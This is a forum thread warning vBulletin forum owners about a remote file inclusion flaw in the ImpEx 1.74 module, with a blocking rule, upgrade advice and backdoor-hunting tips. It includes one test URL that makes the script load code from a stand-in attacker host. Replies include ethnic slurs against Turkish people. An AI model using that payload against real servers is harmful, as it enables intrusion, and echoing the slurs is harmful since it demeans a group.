ALERT for all Forum owners running vBulletin.

[SplitInfinity]

SplitInfinity Here letting you know that....

There is a known Turkish hacker group targeting the adult industry.
The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

First, you should immediately block this class C:

ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all

For some reason, they keep using the same ips. Lame hackers. :-)

I have tracked them down and done some stuff to stop them from what they
are doing.... however you should be warned that if you run vBulletin they
will be hitting you soon! So far they have taken out over 10,000 sites
as reported on securityfocus.

Vulnerability Classification:

* Remote/Network Access Required
* Input Manipulation
* Loss Of Integrity
* Exploit Available
* Verified
* Web Related

Products:

* vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex )

Solution:

Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes:

http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt?

Where the hackers play...
http://www.sanalinfaz.com/forumm/sho...=6140#post6140

They will use the exploit to install mech, eggdrops, backdoors to your server and more. I list below some common places they plant their files....

Places to check:
/tmp
/var/tmp/
/var/tmp/ssh
/var/tmp/root
/var/tmp/

Look for a file simply named "a" it is a backdoor.
That list is NOT all inclusive as different groups will run different
root kits for the same exploit....

Look for hidden directories by hitting TAB.

Example:

ls -la
total 20
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58
drwxrwxrwt 3 root root 4096 May 13 13:20 .
drwxr-xr-x 24 root root 4096 Jan 29 20:50 ..

Notice the seemingly empty one on top?
If it type: cd [TAB]

I get this:
cd \ /multi/

They used control characters to hide the name of the directory. It
becomes exposed when tab completion has a go at it. They basically
named the directory " " space... :-)

So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit
they run is in there. :-)

total 1360
drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 .
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 ..
-rw-r--r-- 1 apache apache 454 Apr 24 07:08 `2Skeletzi.seen
-rw-r--r-- 1 apache apache 143 Apr 24 07:08 `50Cent.seen
-rw-r--r-- 1 apache apache 647 Apr 24 07:08 `50Centz.seen
-rw-r--r-- 1 apache apache 887 Apr 24 07:08 `5OCentz.seen
-rwxr-xr-x 1 apache apache 12 Dec 26 01:51 acycmech
-rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen
-rw-r--r-- 1 apache apache 527 Apr 24 07:08 Alexandreta.seen
-rw-r--r-- 1 apache apache 712 Apr 24 07:08 Al`Quaida.seen
-rw-r--r-- 1 apache apache 452 Apr 24 07:08 A-Tentat`.seen
-rw-r--r-- 1 apache apache 435 Apr 24 07:08 Aurora.seen
-rw-r--r-- 1 apache apache 234 Apr 24 07:08 BadBoy^.seen
-rw-r--r-- 1 apache apache 276 Apr 24 07:08 BaxDeCd`ie.seen
-rw-r--r-- 1 apache apache 941 Apr 24 07:08 B`Nicolita.seen
-rw-r--r-- 1 apache apache 878 Apr 24 07:08 Boxe.seen
-rw-r--r-- 1 apache apache 363 Apr 24 07:08 BUG`Mafia.seen
-rw-r--r-- 1 apache apache 842 Apr 24 07:08 C0Sty.seen
-rw-r--r-- 1 apache apache 620 Apr 24 07:08 CaracalCity.seen
-rw-r--r-- 1 apache apache 799 Apr 24 07:08 caracalmwe.seen
-rw-r--r-- 1 apache apache 339 Apr 24 07:08 CaracalTown.seen
-rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen
-rw-r--r-- 1 apache apache 692 Apr 24 07:08 CartierulHCC.seen
-rw-r--r-- 1 apache apache 581 Apr 24 07:08 CartziDeJoc.seen


Etc....
the list goes on

[$5 submissions]

Thanks for the heads up!

[loverboy]

darn Turkish hackers

they want my sig now?

[split_joel]

hence proving my point chris is by far the whitest cracker here good find dude

[SplitInfinity]

Thanks.

My opinion is that by sharing the info I find, I help secure everyone, not just my customers.

However, it does put my customers in a good place, dont it? :-)

Love ya all...

[Andiz]

Thank you very much!!

[CDSmith]

Bump, if only to piss off the turkish hackers.

[Spunky]

Here's a bump for TD

[madawgz]

thanks for the update

[Tannerb]

Sounds like those Ottoman Empire hackers, they arenhahaha8217;t just hacking the adult industry its all western sites, propaganda saying u attack our homes blah blah we attack your websites

[fusionx]

will this hack work on windows servers?

[Manowar]

thx for the headsup

[fusionx]

Quote:

Originally Posted by -=LC=-

so you are only vulnerable if you have SO old a version

of vB, like older than version 1.7.5 ?

so is it anyone who's site has like ver 2.X.X or newer, this does not effect?

That's the vBulletin ImpEx Module version 1.74.

It's in vBulletin 3.5 (don't know what earlier versions it's also in or if they are susceptible).

[czarina]

turkish people who don't like porn... hmm... is there anything they like, other than ugly women and hashish?

[ladida]

Rofl. Good work. You're only like 3 months too late. All that was supposed to be hacked was already hacked by now.

[JamesK2]

going to work on that soon, thx for the heads u[

[JamesK2]

going to work on that soon, thx for the heads up

[Babaganoosh]

Nice geek detective work. I'm impressed.

[woj]

with a properly secured server it should be impossible to own a site with this exploit...

[elitetec]

just hell with turkish hacker, they even don't know english

[minusonebit]

Quote:

Originally Posted by fusionx

will this hack work on windows servers?

Even if it dosent, you can bet that 100s of others will.

[dunefield]

Cyber Jihad!!!

[SplitInfinity]

Woj, not everyone has a properly secured server because the programs they run have unknown exploits, that BECOME exploits after they are discovered.

[Sparks]

Ah, Thanks for the heads up!

[sfera]

great heads up

[bizarredollars]

Thanks for the info!!

[Dagwolf]

I want my GFY
Money for nothin'
and pics for free.

[split_joel]

Quote:

Originally Posted by fusionx

will this hack work on windows servers?

im not sure if chris solution will work for ur windows server but yes the windows servers are just as much @ risk if not more

[MaddCaz]

Thanks for heads up!